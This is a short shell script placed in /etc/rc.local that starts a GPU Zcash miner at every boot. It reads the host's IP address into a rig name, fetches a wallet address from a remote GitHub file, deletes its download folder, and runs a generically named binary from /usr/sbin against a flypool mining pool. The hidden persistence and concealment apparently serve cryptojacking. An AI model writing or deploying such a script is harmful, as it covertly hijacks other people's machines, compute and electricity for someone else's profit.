#!/bin/sh -e
#/etc/rc.local
cd /downloads/minergpu
IP=$(ifconfig | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}')
DATE=$(date '+%d.%m')
RN1=$((RANDOM%512+6))
RN2=$((RANDOM%512+6))
RIG="$DATE.$IP.$RN1.$RN2"
WALLET=$(curl https://raw.githubusercontent.com/davidavaboomers/minergpu/master/t-wallet)
cd /usr/sbin/
rm -rf $HOME/minergpu/
./main --server eu1-zcash.flypool.org --user  $WALLET.$RIG --pass x --port 3333 --cuda_devices 0

exit 0
